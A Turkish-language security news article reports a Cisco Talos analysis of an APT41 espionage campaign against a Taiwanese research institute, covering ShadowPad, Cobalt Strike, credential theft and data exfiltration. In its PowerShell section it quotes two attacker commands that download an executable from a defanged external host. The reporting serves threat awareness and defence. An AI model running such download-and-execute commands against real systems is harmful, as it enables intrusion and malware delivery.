APT41 ShadowPad ve Cobalt Strike ile Araştırma Enstitüsüne Saldırıyor

   Ağustos 5, 2024  Posted in CyberSecurityNews


APT41 Hacker'ları ShadowPad ve Cobalt Strike ile Araştırma Enstitüsüne Saldırıyor

Cisco Talos, Tayvan hükümetine bağlı bir araştırma enstitüsünü hedef alan gelişmiş bir siber casusluk kampanyasını ortaya çıkardı.

Ünlü Çinli bilgisayar korsanı grubu APT41’e atfedilen saldırıda, ShadowPad kötü amaçlı yazılımı ve Cobalt Strike gibi özelleştirilmiş araçların dağıtımı yapıldı.

DÖRT

Bu makalede saldırının ayrıntıları, saldırganların kullandığı metodolojiler ve siber güvenlik açısından etkileri ele alınmaktadır.

Uygulama Akış Şeması
Uygulama Akış Şeması

Saldırı Açıklandı

İlk Uzlaşma

Kötü amaçlı kampanya 2023 yılının Temmuz ayında başladı ve ilk olarak Ağustos 2023’te Cisco Talos’un komut dosyalarını indirmek ve yürütmek için bir IP adresine bağlanan anormal PowerShell komutlarını tespit etmesiyle tespit edildi.

Mağdur, bilgisayar ve ilgili teknolojiler konusunda uzmanlaşmış bir araştırma enstitüsüydü ve yaptığı işin hassas doğası nedeniyle birincil hedef haline geldi.

Anti-AV Cobalt Strike arka kapısı yapımına dair teknik eğitim makalesi.
Anti-AV Cobalt Strike arka kapısı yapımına dair teknik eğitim makalesi.

Taktikler, Teknikler ve Prosedürler (TTP’ler)

Saldırıda kötü amaçlı yazılımlar, açık kaynaklı araçlar ve gelişmiş prosedürlerin bir kombinasyonu kullanıldı.

Bu kampanyada kullanılan ShadowPad kötü amaçlı yazılımı, yükü başlatmak için yükleyici olarak Microsoft Office IME ikili dosyasının eski bir sürümünü kullanıyordu.

Ayrıca, yerel ayrıcalık yükseltme için uzaktan kod yürütme güvenlik açığını kullanan CVE-2018-0824 için bir kavram kanıtı enjekte etmek üzere özel bir yükleyici de oluşturuldu.

APT41’e atıf

Kanıt ve Değerlendirme

Cisco Talos, kampanyanın ABD hükümetinin Çinli uyruklulardan oluştuğunu iddia ettiği APT41 adlı grup tarafından düzenlendiğine dair orta düzeyde bir güvenle değerlendirmede bulundu.

How to Build a Security Framework With Limited Resources IT Security Team (PDF) - Free Guide

Bu değerlendirme, yalnızca Çinli APT grupları tarafından kullanılan TTP’ler, altyapı ve kötü amaçlı yazılım ailelerindeki örtüşmelere dayanmaktadır.

Saldırıda kullanılan modüler uzaktan erişim trojan’ı (RAT) ShadowPad, PlugX’in halefi olarak kabul ediliyor ve APT41 de dahil olmak üzere Çinli hacker gruplarına satıldığı biliniyor.

Tarihsel Bağlam

Çin’in Chengdu kentinden olduğu düşünülen APT41’in stratejik çıkarlara sahip varlıkları hedef alma geçmişi vardır. Grubun faaliyetleri, Mustang Panda ve Tonto Team gibi diğer Çinli hack gruplarına atfedilenler de dahil olmak üzere çeşitli kampanyalarda bildirilmiştir.

Mevcut kampanya, aynı yükleme mekanizmalarını, enfeksiyon zincirlerini ve dosya adlarını kullanması gibi önceki saldırılarla benzerlikler gösteriyor.

Teknik Analiz

Kötü Amaçlı Yazılım Dağıtımı

Ağa erişim sağladıktan sonra saldırganlar kötü amaçlı kod ve ikili dosyaları çalıştırarak bir dayanak noktası oluşturdular. Web sunucusunun bulunduğu makineye bir web kabuğu yükleyerek daha fazla keşif ve yürütmeye olanak sağladılar.

Saldırganlar, ShadowPad ve Cobalt Strike’ı üç farklı yaklaşım kullanarak dağıttı: webshell, RDP erişimi ve ters kabuk.

PowerShell Komutları

Saldırganlar başlangıçta ek betikleri indirmek ve çalıştırmak için PowerShell komutlarını kullandılar.

powershell (new-object System.Net.WebClient).DownloadFile('https://www.nss.com[.]tw/calc.exe','C:/users/public/calc.exe');"
powershell (new-object System.Net.WebClient).DownloadFile('https://www.nss.com[.]tw/calc.exe','C:/users/public/calc2.exe');              "

Tespit ve kesintiye rağmen, tehlikeye atılmış bir C2 sunucusundan Cobalt Strike kötü amaçlı yazılımını indirmek için diğer PowerShell komutlarını kullanmaya devam ettiler.

GoLang dilinde yazılan Cobalt Strike yükleyicisi, Windows Defender tarafından tespit edilmekten kaçınmak için tasarlandı.

Bilgi Toplama ve Sızdırma

Kimlik Hasadı

Tehdit aktörleri, Mimikatz ve WebBrowserPassView gibi araçları kullanarak tehlikeye atılan ortamdan parolaları topladı. Kullanıcı hesapları, dizin yapısı ve ağ yapılandırmaları hakkında bilgi edinmek için birkaç komut yürüttüler.

Ayrıca ShadowPad, tehlikeye atılan ağdaki diğer makineleri keşfetmek için hafif bir ağ taraması gerçekleştirdi.

Veri Sızdırma

Saldırganlar birçok dosyayı dışarı sızdırmak için dosyaları sıkıştırmak ve bir arşive şifrelemek için 7zip kullandılar. Daha sonra arşivi komuta ve kontrol (C2) sunucusuna göndermek için arka kapılar kullandılar.

ShadowPad Yükleyici

Yapılan araştırmada, aynı yan yükleme tekniğini kullanan ancak farklı savunmasız ikili dosyaları kullanan ShadowPad yükleyicisinin iki farklı yinelemesi ortaya çıkarıldı.

İlk varyant, güncel olmayan bir Microsoft Office IME ikili sürümünü hedef alırken, daha yeni varyant, kötü amaçlı yazılımı başlatmak için farklı bir meşru ikili dosya kullanıyordu.

imjp14k yükleyici sağlama toplamı
imjp14k yükleyici sağlama toplamı

Kobalt Darbeli Yükleyici

GoLang’da geliştirilen benzersiz bir Cobalt Strike yükleyicisi de tespit edildi. Antivirüs tespitinden kaçınmak için tasarlanmıştı.

Yükleyici, steganografi kullanılarak bir resim içerisine gizlendi ve indirme, şifre çözme ve yürütme rutinleri çalışma zamanı belleğinde gerçekleşti.

Saldırıdan kaynaklanan kötü amaçlı yazılım
Saldırıdan kaynaklanan kötü amaçlı yazılım

Tayvanlı araştırma enstitüsüne yönelik APT41 saldırısı, devlet destekli bilgisayar korsanlığı gruplarının oluşturduğu sürekli ve gelişen tehdidin altını çiziyor.

ShadowPad ve Cobalt Strike gibi gelişmiş kötü amaçlı yazılımlar, gelişmiş TTP’lerle bir araya geldiğinde, güçlü siber güvenlik önlemlerine olan ihtiyacı ortaya koyuyor.

Siber casusluk kampanyaları kritik araştırma ve geliştirme kuruluşlarını hedef aldığından, kuruluşlar savunma stratejilerinde dikkatli ve proaktif olmalıdır.

Are you from SOC and DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Free Access



Source link